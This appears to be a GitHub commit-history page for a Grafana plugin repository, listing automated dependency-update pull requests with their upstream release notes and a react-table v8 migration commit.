3ea69e2f8e028a71ddffe84986000866fe4fadbb
113 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
renovate-sh-app[bot]
|
f3fa2522e7 |
chore(deps): update dependency @types/react-dom to v18.3.7 (#2174)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/react-dom](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react-dom) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react-dom)) | [`18.3.1` → `18.3.7`](https://renovatebot.com/diffs/npm/@types%2freact-dom/18.3.1/18.3.7) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
ismail simsek
|
1bb5e8a5dd |
chore: bump @grafana/create-plugin configuration to 6.7.1 (#2167)
Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
ismail simsek
|
da27b9a917 |
chore(deps): update various dependencies (#2166)
yarn 4.9.4 -> 4.12.0 glob 11.1.0 -> 13.0.0 js-yaml 4.1.0 -> 4.1.1 |
||
|
renovate-sh-app[bot]
|
76c7603a4c |
chore(deps): update dependency cspell to v6.31.3 (#2165)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [cspell](https://cspell.org/) ([source](https://redirect.github.com/streetsidesoftware/cspell/tree/HEAD/packages/cspell)) | [`6.13.3` → `6.31.3`](https://renovatebot.com/diffs/npm/cspell/6.13.3/6.31.3) |  |  | --- ### Release Notes <details> <summary>streetsidesoftware/cspell (cspell)</summary> ### [`v6.31.3`](https://redirect.github.com/streetsidesoftware/cspell/releases/tag/v6.31.3) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3) #### What's Changed - fix: Fix dynamic loader on Windows by [@​Jason3S](https://redirect.github.com/Jason3S) in [#​4707](https://redirect.github.com/streetsidesoftware/cspell/pull/4707) **Full Changelog**: <https://github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3> ### [`v6.31.2`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6312-2023-04-14) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.1...v6.31.2) **Note:** Version bump only for package cspell ### [`v6.31.1`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6311-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.0...v6.31.1) **Note:** Version bump only for package cspell ### [`v6.31.0`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6310-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.30.2...v6.31.0) **Note:** Version bump only for package cspell #### 6.30.2 (2023-03-18) ##### Bug Fixes - lock cosmiconfig to 8.0.0 ([#​4335](https://redirect.github.com/streetsidesoftware/cspell/issues/4335)) ([0f37e2c]( |
||
|
renovate-sh-app[bot]
|
4eb55efa59 |
chore(deps): update dependency @playwright/test to ^1.55.0 (#2156)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@playwright/test](https://playwright.dev) ([source](https://redirect.github.com/microsoft/playwright)) | [`^1.52.0` → `^1.55.0`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.55.0/1.57.0) |  |  | --- ### Release Notes <details> <summary>microsoft/playwright (@​playwright/test)</summary> ### [`v1.57.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.57.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.1...v1.57.0) #### Speedboard In HTML reporter, there's a new tab we call "Speedboard": <img width="600" alt="speedboard" src="https://github.com/user-attachments/assets/4ba117ea-ea94-4b6a-82b2-8bbd00dfe81c" /> It shows you all your executed tests sorted by slowness, and can help you understand where your test suite is taking longer than expected. Take a look at yours - maybe you'll find some tests that are spending a longer time waiting than they should! #### Chrome for Testing Starting with this release, Playwright switches from Chromium, to using [Chrome for Testing](https://developer.chrome.com/blog/chrome-for-testing/) builds. Both headed and headless browsers are subject to this. Your tests should still be passing after upgrading to Playwright 1.57. We're expecting no functional changes to come from this switch. The biggest change is the new icon and title in your toolbar. <img width="500" alt="new and old logo" src="https://github.com/user-attachments/assets/e9a5c4f2-9f35-4c27-9382-0f5eda377097" /> If you still see an unexpected behaviour change, please [file an issue](https://redirect.github.com/microsoft/playwright/issues/new). On Arm64 Linux, Playwright continues to use Chromium. #### Waiting for webserver output [testConfig.webServer](https://playwright.dev/docs/api/class-testconfig#test-config-web-server) added a `wait` field. Pass a regular expression, and Playwright will wait until the webserver logs match it. ```js import { defineConfig } from '@​playwright/test'; export default defineConfig({ webServer: { command: 'npm run start', wait: { stdout: '/Listening on port (?<my_server_port>\\d+)/' }, }, }); ``` If you include a named capture group into the expression, then Playwright will provide the capture group contents via environment variables: ```js import { test, expect } from '@​playwright/test'; test.use({ baseUrl: `http://localhost:${process.env.MY_SERVER_PORT ?? 3000}` }); test('homepage', async ({ page }) => { await page.goto('/'); }); ``` This is not just useful for capturing varying ports of dev servers. You can also use it to wait for readiness of a service that doesn't expose an HTTP readiness check, but instead prints a readiness message to stdout or stderr. #### Breaking Change After 3 years of being deprecated, we removed `Page#accessibility` from our API. Please use other libraries such as [Axe](https://www.deque.com/axe/) if you need to test page accessibility. See our Node.js [guide](https://playwright.dev/docs/accessibility-testing) for integration with Axe. #### New APIs - New property [testConfig.tag](https://playwright.dev/docs/api/class-testconfig#test-config-tag) adds a tag to all tests in this run. This is useful when using [merge-reports](https://playwright.dev/docs/test-sharding#merging-reports-from-multiple-shards). - [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console) event is emitted when JavaScript within the worker calls one of console API methods, e.g. console.log or console.dir. [worker.waitForEvent()](https://playwright.dev/docs/api/class-worker#worker-wait-for-event) can be used to wait for it. - [locator.description()](https://playwright.dev/docs/api/class-locator#locator-description) returns locator description previously set with [locator.describe()](https://playwright.dev/docs/api/class-locator#locator-describe), and `Locator.toString()` now uses the description when available. - New option [`steps`](https://playwright.dev/docs/api/class-locator#locator-click-option-steps) in [locator.click()](https://playwright.dev/docs/api/class-locator#locator-click) and [locator.dragTo()](https://playwright.dev/docs/api/class-locator#locator-drag-to) that configures the number of `mousemove` events emitted while moving the mouse pointer to the target element. - Network requests issued by [Service Workers](https://playwright.dev/docs/service-workers#network-events-and-routing) are now reported and can be routed through the [BrowserContext](https://playwright.dev/docs/api/class-browsercontext), only in Chromium. You can opt out using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_NETWORK` environment variable. - Console messages from Service Workers are dispatched through [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console). You can opt out of this using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_CONSOLE` environment variable. #### Browser Versions - Chromium 143.0.7499.4 - Mozilla Firefox 144.0.2 - WebKit 26.0 ### [`v1.56.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.0...v1.56.1) #### Highlights [#​37871](https://redirect.github.com/microsoft/playwright/issues/37871) chore: allow local-network-access permission in chromium [#​37891](https://redirect.github.com/microsoft/playwright/issues/37891) fix(agents): remove workspaceFolder ref from vscode mcp [#​37759](https://redirect.github.com/microsoft/playwright/issues/37759) chore: rename agents to test agents [#​37757](https://redirect.github.com/microsoft/playwright/issues/37757) chore(mcp): fallback to cwd when resolving test config #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.56.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.1...v1.56.0) #### Playwright Agents Introducing Playwright Agents, three custom agent definitions designed to guide LLMs through the core process of building a Playwright test: - **🎭 planner** explores the app and produces a Markdown test plan - **🎭 generator** transforms the Markdown plan into the Playwright Test files - **🎭 healer** executes the test suite and automatically repairs failing tests Run `npx playwright init-agents` with your client of choice to generate the latest agent definitions: ```bash # Generate agent files for each agentic loop # Visual Studio Code npx playwright init-agents --loop=vscode # Claude Code npx playwright init-agents --loop=claude # opencode npx playwright init-agents --loop=opencode ``` > \[!NOTE] > VS Code v1.105 (currently on the VS Code Insiders channel) is needed for the agentic experience in VS Code. It will become stable shortly, we are a bit ahead of times with this functionality! [Learn more about Playwright Agents](https://playwright.dev/docs/test-agents) #### New APIs - New methods [page.consoleMessages()](https://playwright.dev/docs/api/class-page#page-console-messages) and [page.pageErrors()](https://playwright.dev/docs/api/class-page#page-page-errors) for retrieving the most recent console messages from the page - New method [page.requests()](https://playwright.dev/docs/api/class-page#page-requests) for retrieving the most recent network requests from the page - Added [`--test-list` and `--test-list-invert`](https://playwright.dev/docs/test-cli#test-list) to allow manual specification of specific tests from a file #### UI Mode and HTML Reporter - Added option to `'html'` reporter to disable the "Copy prompt" button - Added option to `'html'` reporter and UI Mode to merge files, collapsing test and describe blocks into a single unified list - Added option to UI Mode mirroring the `--update-snapshots` options - Added option to UI Mode to run only a single worker at a time #### Breaking Changes - Event [browserContext.on('backgroundpage')](https://playwright.dev/docs/api/class-browsercontext#browser-context-event-background-page) has been deprecated and will not be emitted. Method [browserContext.backgroundPages()](https://playwright.dev/docs/api/class-browsercontext#browser-context-background-pages) will return an empty list #### Miscellaneous - Aria snapshots render and compare `input` `placeholder` - Added environment variable `PLAYWRIGHT_TEST` to Playwright worker processes to allow discriminating on testing status #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.55.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.55.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.0...v1.55.1) ##### Highlights [#​37479](https://redirect.github.com/microsoft/playwright/issues/37479) - \[Bug]: Upgrade Chromium to 140.0.7339.186. [#​37147](https://redirect.github.com/microsoft/playwright/issues/37147) - \[Regression]: Internal error: step id not found. [#​37146](https://redirect.github.com/microsoft/playwright/issues/37146) - \[Regression]: HTML reporter displays a broken chip link when there are no projects. [#​37137](https://redirect.github.com/microsoft/playwright/pull/37137) - Revert "fix(a11y): track inert elements as hidden". [#​37532](https://redirect.github.com/microsoft/playwright/pull/37532) - chore: do not use -k option #### Browser Versions - Chromium 140.0.7339.186 - Mozilla Firefox 141.0 - WebKit 26.0 This version was also tested against the following stable channels: - Google Chrome 139 - Microsoft Edge 139 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [x] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Sriram <153843+yesoreyeram@users.noreply.github.com> |
||
dependabot[bot]
|
0232194405 |
Bump qs from 6.14.0 to 6.14.1 (#2161)
Bumps [qs](https://github.com/ljharb/qs) from 6.14.0 to 6.14.1. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/ljharb/qs/blob/main/CHANGELOG.md">qs's changelog</a>.</em></p> <blockquote> <h2><strong>6.14.1</strong></h2> <ul> <li>[Fix] ensure arrayLength applies to <code>[]</code> notation as well</li> <li>[Fix] <code>parse</code>: when a custom decoder returns <code>null</code> for a key, ignore that key</li> <li>[Refactor] <code>parse</code>: extract key segment splitting helper</li> <li>[meta] add threat model</li> <li>[actions] add workflow permissions</li> <li>[Tests] <code>stringify</code>: increase coverage</li> <li>[Dev Deps] update <code>eslint</code>, <code>@ljharb/eslint-config</code>, <code>npmignore</code>, <code>es-value-fixtures</code>, <code>for-each</code>, <code>object-inspect</code></li> </ul> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
f3c5a15a20 |
chore(deps): update dependency @grafana/plugin-e2e to ^2.2.3 (#2155)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@grafana/plugin-e2e](https://redirect.github.com/grafana/plugin-tools) ([source](https://redirect.github.com/grafana/plugin-tools/tree/HEAD/packages/plugin-e2e)) | [`^2.1.12` → `^2.2.3`](https://renovatebot.com/diffs/npm/@grafana%2fplugin-e2e/2.1.12/2.2.3) |  |  | --- ### Release Notes <details> <summary>grafana/plugin-tools (@​grafana/plugin-e2e)</summary> ### [`v2.2.3`](https://redirect.github.com/grafana/plugin-tools/releases/tag/%40grafana/plugin-e2e%402.2.3) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.2...@grafana/plugin-e2e@2.2.3) ##### 🐛 Bug Fix - CreatePlugin: Adding step about health check functionality in ds tutorial. [#​2222](https://redirect.github.com/grafana/plugin-tools/pull/2222) ([@​mckn](https://redirect.github.com/mckn)) ##### Authors: 1 - Marcus Andersson ([@​mckn](https://redirect.github.com/mckn)) ### [`v2.2.2`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) ### [`v2.2.1`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v221-Thu-Oct-09-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.0...@grafana/plugin-e2e@2.2.1) ##### 🐛 Bug Fix - E2E: fix for flakiness in PanelEditPage.refreshPanel [#​2207](https://redirect.github.com/grafana/plugin-tools/pull/2207) ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) ##### Authors: 1 - Hugo Häggmark ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) *** ### [`v2.2.0`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v220-Tue-Oct-07-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.14...@grafana/plugin-e2e@2.2.0) ##### 🚀 Enhancement - Plugin E2E: Add support for specifying user preferences [#​2131](https://redirect.github.com/grafana/plugin-tools/pull/2131) ([@​sunker](https://redirect.github.com/sunker)) ##### Authors: 1 - Erik Sundell ([@​sunker](https://redirect.github.com/sunker)) *** ### [`v2.1.14`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v2114-Mon-Sep-29-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.13...@grafana/plugin-e2e@2.1.14) ##### 🐛 Bug Fix - Update dependency uuid to v13 [#​2139](https://redirect.github.com/grafana/plugin-tools/pull/2139) ([@​renovate\[bot\]](https://redirect.github.com/renovate\[bot])) ##### Authors: 1 - [@​renovate\[bot\]](https://redirect.github.com/renovate\[bot]) *** ### [`v2.1.13`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
dependabot[bot]
|
3d631aedd7 |
Bump glob from 10.4.5 to 11.1.0 (#2153)
Bumps [glob](https://github.com/isaacs/node-glob) from 10.4.5 to 11.1.0. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/isaacs/node-glob/blob/main/changelog.md">glob's changelog</a>.</em></p> <blockquote> <h1>changeglob</h1> <h2>13</h2> <ul> <li>Move the CLI program out to a separate package, <code>glob-bin</code>. Install that if you'd like to continue using glob from the command line.</li> </ul> <h2>12</h2> <ul> <li>Remove the unsafe <code>--shell</code> option. The <code>--shell</code> option is now ONLY supported on known shells where the behavior can be implemented safely.</li> </ul> <h2>11.1</h2> <p><a href="https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2">GHSA-5j98-mcp5-4vw2</a></p> <ul> <li>Add the <code>--shell</code> option for the command line, with a warning that this is unsafe. (It will be removed in v12.)</li> <li>Add the <code>--cmd-arg</code>/<code>-g</code> as a way to <em>safely</em> add positional arguments to the command provided to the CLI tool.</li> <li>Detect commands with space or quote characters on known shells, and pass positional arguments to them safely, avoiding <code>shell:true</code> execution.</li> </ul> <h2>11.0</h2> <ul> <li>Drop support for node before v20</li> </ul> <h2>10.4</h2> <ul> <li>Add <code>includeChildMatches: false</code> option</li> <li>Export the <code>Ignore</code> class</li> </ul> <h2>10.3</h2> <ul> <li>Add <code>--default -p</code> flag to provide a default pattern</li> <li>exclude symbolic links to directories when <code>follow</code> and <code>nodir</code> are both set</li> </ul> <h2>10.2</h2> <ul> <li>Add glob cli</li> </ul> <h2>10.1</h2> <ul> <li>Return <code>'.'</code> instead of the empty string <code>''</code> when the current working directory is returned as a match.</li> <li>Add <code>posix: true</code> option to return <code>/</code> delimited paths, even on</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
4eece4b75e |
chore(deps): update dependency terser-webpack-plugin to ^5.3.14 (#2154)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [terser-webpack-plugin](https://redirect.github.com/webpack/terser-webpack-plugin) | [`^5.3.10` → `^5.3.14`](https://renovatebot.com/diffs/npm/terser-webpack-plugin/5.3.14/5.3.16) |  |  | --- ### Release Notes <details> <summary>webpack/terser-webpack-plugin (terser-webpack-plugin)</summary> ### [`v5.3.16`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5316-2025-12-11) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.15...v5.3.16) ### [`v5.3.15`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5315-2025-12-05) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.14...v5.3.15) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
02a323b142 |
chore(deps): update dependency semver to ^7.7.2 (#2147)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [semver](https://redirect.github.com/npm/node-semver) | [`^7.6.3` → `^7.7.2`](https://renovatebot.com/diffs/npm/semver/7.7.2/7.7.3) |  |  | --- ### Release Notes <details> <summary>npm/node-semver (semver)</summary> ### [`v7.7.3`](https://redirect.github.com/npm/node-semver/blob/HEAD/CHANGELOG.md#773-2025-10-06) [Compare Source](https://redirect.github.com/npm/node-semver/compare/v7.7.2...v7.7.3) ##### Bug Fixes - [`e37e0ca`]( |
||
|
dependabot[bot]
|
0c1f1203ea |
Bump js-yaml from 3.14.1 to 3.14.2 (#2148)
Bumps [js-yaml](https://github.com/nodeca/js-yaml) from 3.14.1 to 3.14.2. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md">js-yaml's changelog</a>.</em></p> <blockquote> <h2>[3.14.2] - 2025-11-15</h2> <h3>Security</h3> <ul> <li>Backported v4.1.1 fix to v3</li> </ul> <h2>[4.1.1] - 2025-11-12</h2> <h3>Security</h3> <ul> <li>Fix prototype pollution issue in yaml merge (<<) operator.</li> </ul> <h2>[4.1.0] - 2021-04-15</h2> <h3>Added</h3> <ul> <li>Types are now exported as <code>yaml.types.XXX</code>.</li> <li>Every type now has <code>options</code> property with original arguments kept as they were (see <code>yaml.types.int.options</code> as an example).</li> </ul> <h3>Changed</h3> <ul> <li><code>Schema.extend()</code> now keeps old type order in case of conflicts (e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as <code>abcd</code> instead of <code>cbad</code>).</li> </ul> <h2>[4.0.0] - 2021-01-03</h2> <h3>Changed</h3> <ul> <li>Check <a href="https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md">migration guide</a> to see details for all breaking changes.</li> <li>Breaking: "unsafe" tags <code>!!js/function</code>, <code>!!js/regexp</code>, <code>!!js/undefined</code> are moved to <a href="https://github.com/nodeca/js-yaml-js-types">js-yaml-js-types</a> package.</li> <li>Breaking: removed <code>safe*</code> functions. Use <code>load</code>, <code>loadAll</code>, <code>dump</code> instead which are all now safe by default.</li> <li><code>yaml.DEFAULT_SAFE_SCHEMA</code> and <code>yaml.DEFAULT_FULL_SCHEMA</code> are removed, use <code>yaml.DEFAULT_SCHEMA</code> instead.</li> <li><code>yaml.Schema.create(schema, tags)</code> is removed, use <code>schema.extend(tags)</code> instead.</li> <li><code>!!binary</code> now always mapped to <code>Uint8Array</code> on load.</li> <li>Reduced nesting of <code>/lib</code> folder.</li> <li>Parse numbers according to YAML 1.2 instead of YAML 1.1 (<code>01234</code> is now decimal, <code>0o1234</code> is octal, <code>1:23</code> is parsed as string instead of base60).</li> <li><code>dump()</code> no longer quotes <code>:</code>, <code>[</code>, <code>]</code>, <code>(</code>, <code>)</code> except when necessary, <a href="https://redirect.github.com/nodeca/js-yaml/issues/470">#470</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/557">#557</a>.</li> <li>Line and column in exceptions are now formatted as <code>(X:Y)</code> instead of <code>at line X, column Y</code> (also present in compact format), <a href="https://redirect.github.com/nodeca/js-yaml/issues/332">#332</a>.</li> <li>Code snippet created in exceptions now contains multiple lines with line numbers.</li> <li><code>dump()</code> now serializes <code>undefined</code> as <code>null</code> in collections and removes keys with <code>undefined</code> in mappings, <a href="https://redirect.github.com/nodeca/js-yaml/issues/571">#571</a>.</li> <li><code>dump()</code> with <code>skipInvalid=true</code> now serializes invalid items in collections as null.</li> <li>Custom tags starting with <code>!</code> are now dumped as <code>!tag</code> instead of <code>!<!tag></code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/576">#576</a>.</li> <li>Custom tags starting with <code>tag:yaml.org,2002:</code> are now shorthanded using <code>!!</code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/258">#258</a>.</li> </ul> <h3>Added</h3> <ul> <li>Added <code>.mjs</code> (es modules) support.</li> <li>Added <code>quotingType</code> and <code>forceQuotes</code> options for dumper to configure string literal style, <a href="https://redirect.github.com/nodeca/js-yaml/issues/290">#290</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/529">#529</a>.</li> <li>Added <code>styles: { '!!null': 'empty' }</code> option for dumper (serializes <code>{ foo: null }</code> as "<code>foo: </code>"), <a href="https://redirect.github.com/nodeca/js-yaml/issues/570">#570</a>.</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b7a953b178 |
chore(deps): update dependency style-loader to v3.3.4 (#2151)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[style-loader](https://redirect.github.com/webpack-contrib/style-loader)
| [`3.3.3` →
`3.3.4`](https://renovatebot.com/diffs/npm/style-loader/3.3.3/3.3.4) |
|
|
---
### Release Notes
<details>
<summary>webpack-contrib/style-loader (style-loader)</summary>
###
[`v3.3.4`](https://redirect.github.com/webpack/style-loader/releases/tag/v3.3.4)
[Compare
Source](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
#####
[3.3.4](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
(2024-01-09)
##### Bug Fixes
- css experiments logic
([c12e70b](
|
||
|
renovate-sh-app[bot]
|
c02767b1c3 |
chore(deps): update dependency sass-loader to v13.3.3 (#2146)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [sass-loader](https://redirect.github.com/webpack/sass-loader) | [`13.3.1` -> `13.3.3`](https://renovatebot.com/diffs/npm/sass-loader/13.3.1/13.3.3) |  |  | --- ### Release Notes <details> <summary>webpack/sass-loader (sass-loader)</summary> ### [`v13.3.3`](https://redirect.github.com/webpack/sass-loader/blob/HEAD/CHANGELOG.md#1400-2024-01-15) [Compare Source](https://redirect.github.com/webpack/sass-loader/compare/v13.3.2...v13.3.3) ##### ⚠ BREAKING CHANGES - removed `fibers` support - minimum supported Node.js version is `18.12.0` ([627f55d]( |
||
|
ismail simsek
|
cc492b916d |
Update react-table to v8 (#2131)
Updating react-table to v8. - Migrating the existing table to v8 - Preserving the visuals and logic What's done? - Cell components are moved under `Cells` folder - Old styles for react-table-6 is removed. - Old types are removed - All logic was preserved - Some cell components are removed for simplicity Fixes: https://github.com/grafana/oss-big-tent-squad/issues/125 |
||
|
renovate-sh-app[bot]
|
b11f2b1902 |
chore(deps): update dependency @types/node to ^20.19.16 (#2105)
